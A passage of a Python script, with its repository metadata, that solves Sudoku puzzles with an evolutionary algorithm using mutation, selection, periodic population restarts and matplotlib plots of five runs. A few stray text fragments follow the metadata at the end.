choice(mating_pool_list))\n offspring_list.append(crossed_over_grid)\n\n # Return the mating pool along with the offsprings to create one population list that will all undergo crossover\n # in the later processes.\n return mating_pool_list + offspring_list\n\n\ndef mutate_population(population_list, filename):\n \"\"\"\n Function uses and applies the mechanics of the individual-level mutation operator to perform mutations across all\n candidate Sudoku solution grids in a specified population.\n :param population_list: The list of sudoku solution grids.\n :param filename: The list fitness_scores for the corresponding Sudoku solution grids.\n :return: Returns a list of mutated sudoku solution grids\n \"\"\"\n return [mutate_individual(ind_sudoku, filename) for ind_sudoku in population_list]\n\n\ndef best_population_of_sudokus(population_list, fitness_population):\n \"\"\"\n Function that gets the best Sudoku solution grid along with its corresponding fitness score.\n :param population_list: The list of sudoku solution grids.\n :param fitness_population: The list fitness_scores for the corresponding Sudoku solution grids.\n :return: Returns a sorted\n \"\"\"\n return sorted(zip(population_list, fitness_population), key=lambda individual_fitness: individual_fitness[1])[0]\n\n\n##########################\n# EVOLUTIONARY ALGORITHM #\n##########################\ndef evolve(filename):\n \"\"\"\n Function represents the evolutionary algorithm for solving Sudoku puzzles, implementing all problem-specific\n components to the task, for instance the appropriate solution space and solution representation, fitness function,\n crossover and mutation operators for the chosen representation, population initialisation, selection and\n replacement methods, and an appropriate termination criterion.\n :param filename: Specified name of file, which is essentially the Sudoku puzzle grid.\n :return: Returns a list of all the best fitness score in each generation. The size of the list will be dependent on\n the number generations that are request from user input.\n \"\"\"\n population = generate_population(filename, POPULATION_SIZE)\n fitness_pop_scores = generate_fitness_scores(population)\n best_fitness_score = min(fitness_pop_scores)\n gen = 0\n total_gens = 0\n # This list will store all the best fitness score per generation.\n best_fits = []\n\n # While the total number of generations ran have not reached the specified value of NUMBER_GENERATIONS, keep running\n # the following code within the while loop.\n while total_gens < NUMBER_GENERATIONS:\n gen += 1\n total_gens += 1\n\n # Select population of individuals to undergo crossover and mutation\n mating_pool = select_population(population, fitness_pop_scores)\n\n # Perform crossover to create new offsprings\n offspring_population = crossover_population(mating_pool)\n\n # Mutate the crossed-over mating pool of offsprings\n population = mutate_population(offspring_population, filename)\n\n fitness_pop_scores = generate_fitness_scores(population)\n worst_fitness_score = max(fitness_pop_scores)\n best_sudoku_grid, best_fitness_score = best_population_of_sudokus(population, fitness_pop_scores)\n\n best_fits.append(best_fitness_score)\n\n # If gen counter reaches the reset point integer value, a technique that prevents convergence to local minima,\n # also known as Judgement Day, will keep the current candidate Sudoku solution with the best (lowest) fitness\n # score, and repopulate with new (population size - 1) candidate solutions.\n if gen == RESTART_POINT:\n print(\"#%2d\" % total_gens, \"Highest Fitness (Worst):%3d\" % worst_fitness_score, \" \",\n \"Lowest Fitness (Best):%3d\" % best_fitness_score)\n\n # When value equates to RESTART_POINT value, gen value will reset and continue to be incremented and\n # repeats the same process\n gen = 0\n\n selected_grid = best_sudoku_grid\n fitness_pop_scores.remove(best_fitness_score)\n population.remove(best_sudoku_grid)\n population = generate_population(filename, POPULATION_SIZE - 1)\n population.append(selected_grid)\n fitness_pop_scores = generate_fitness_scores(population)\n best_fitness_score = min(fitness_pop_scores)\n\n print(\"------------------------------------------RESTART-----------------------------------------------\")\n print()\n\n # If the best fitness score reaches 0, print a statement indicating the success of the algorithm in finding a\n # solution to the given Sudoku puzzle. Subsequently, print the whole Sudoku Grid that presents the optimal\n # solution in a (9 x 9) manner. Print out the total number of generations ran to reach this point.\n elif best_fitness_score == 0:\n print()\n print(\"------------------------------------------FINISHED----------------------------------------------\")\n for n in best_sudoku_grid:\n print(n)\n print()\n print(\"Awesome! Best Fit of 0 Reached!\")\n print(\"Total number of Generations Ran: \" + str(total_gens))\n print()\n break\n\n print(str(total_gens) + \" Desired Generations Reached!\")\n print()\n return best_fits\n\n\ndef plot_results(run1, run2, run3, run4, run5):\n \"\"\"\n Function plots all 5 runs onto one graph.\n :param run1: First run of the experiment in evolve(filename)\n :param run2: Second run of the experiment in evolve(filename)\n :param run3: Third run of the experiment in evolve(filename)\n :param run4: Fourth run of the experiment in evolve(filename)\n :param run5: Fifth run of the experiment in evolve(filename)\n \"\"\"\n # Plots 5 individual lines onto the same graph.\n plt.plot(run1, label=\"1st Run\")\n plt.plot(run2, label=\"2nd Run\")\n plt.plot(run3, label=\"3rd Run\")\n plt.plot(run4, label=\"4th Run\")\n plt.plot(run5, label=\"5th Run\")\n\n plt.xlabel(\"Number of Generations\")\n plt.ylabel(\"Fitness of the Best Candidate From Population\")\n plt.title(\"Overall Evolutionary Algorithm Performance Graph For Population Size: {}\".format(POPULATION_SIZE))\n plt.legend()\n plt.show()\n\n\ndef run_5_times(filename):\n \"\"\"\n Function will iteratively run the same evolve() experiment 5 times for a specified filename as shown below.\n :param filename: Specified name of file, which is essentially the Sudoku puzzle grid.\n \"\"\"\n total_runs = []\n for n in range(5):\n print(\"Performing Run #\" + str(n + 1))\n total_runs.append(evolve(filename))\n\n plot_results(total_runs[0], total_runs[1], total_runs[2], total_runs[3], total_runs[4])\n\n\nif __name__ == \"__main__\":\n grid1 = \"grid1.txt\"\n grid2 = \"grid2.txt\"\n grid3 = \"grid3.txt\"\n\n ##############\n # USER INPUT #\n ##############\n print(\"### WELCOME TO SUDOKU SOLVER USING AN EVOLUTIONARY ALGORITHM ###\")\n print()\n choice_of_grid = input(\"Specify Grid File to Run [grid1, grid2 or grid3]: \")\n population_size_choice = input(\"Population Size [10, 100, 1000 or 10000]: \")\n POPULATION_SIZE = int(population_size_choice)\n truncation_choice = input(\"Truncation Rate [100% = 1.0; 50% = 0.5; and etc.]: \")\n TRUNCATION_RATE = float(truncation_choice)\n mutation_rate_choice = input(\"Mutation Rate Ranging from \" + str(0.01) + \" to \" + str(1.00) + \": \")\n MUTATION_RATE = float(mutation_rate_choice)\n number_gens = input(\"Number of Generations to Be Done: \")\n NUMBER_GENERATIONS = int(number_gens)\n reset_point = input(\"Please Select a Reset Point After a Specified Number of Generations. \\n\" +\n \"This is to Prevent Convergence to a Local Minimum: \")\n RESTART_POINT = int(reset_point)\n print()\n print(\"Thank You For Your Input! The Program Will Run Shortly...\")\n print()\n\n if choice_of_grid == \"grid1\":\n run_5_times(grid1)\n\n elif choice_of_grid == \"grid2\":\n run_5_times(grid2)\n\n elif choice_of_grid == \"grid3\":\n run_5_times(grid3)\n", "repo_name": "IndraBr16/EvolutionaryAlgorithms", "sub_path": "sudoku_ea.py", "file_name": "sudoku_ea.py", "file_ext": "py", "file_size_in_byte": 22760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.randint", "line_number": 146, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 151, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 192, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 212, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 220, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 329, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 451, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 453, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 455, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 455, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 458, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 459, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 459, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 460, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 460, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 461, "usage_type": "name"}]}
{message}
.+
\", \"\").replace(\"